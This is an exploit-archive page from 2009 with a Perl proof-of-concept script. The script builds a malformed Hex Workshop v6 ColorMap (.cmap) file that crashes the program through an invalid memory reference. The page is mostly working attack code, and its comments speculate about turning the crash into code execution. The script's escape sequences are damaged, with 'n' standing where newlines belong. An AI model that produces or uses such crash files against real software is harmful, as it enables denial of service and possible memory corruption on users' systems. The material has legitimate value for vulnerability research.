Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference PoC
# Published : 2009-02-03
# Author : DATA_SNIPER
# Previous Title : UltraVNC/TightVNC Multiple VNC Clients Multiple Integer Overflow PoC
# Next Title : Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC

#!/usr/bin/perl -w
# Hex Workshop v6 "ColorMap files .cmap" Invalid Memory Reference Crash POC
# Discovred by : DATA_SNIPER
# for more information vist my blog:http://datasniper.arab4services.net/
# the Exploit it's  very hard to implemented,if we can make the "reference" point to  valid memory location contain
# unicode string we can corrupt the memory and get code execution(it's not so easy as you can see,try it manually in olly).
print "==========================================================================n";
print "Hex Workshop v6 (ColorMap files .cmap) Invalid Memory Reference crash POCn";
print "Discovred by DATA_SNIPERn";
print "Greetz to: arab4services team and AT4RE Teamn";
print "===================================================================== n";
my $crash = '#Simple POC by DATA_SNIPER'."n".'"%s"= RGB(0, 0, 0)'; #don't worry about it ,it's not Format string bug :)
my $file = "cr4sh.cmap" ;
open(my $data, ">>$file") or die "Cannot open $file";
print $data $crash;
close($data);
print "$file has been createdn";
print "open it in HexWorkshop.n";

# www.Syue.com [2009-02-03]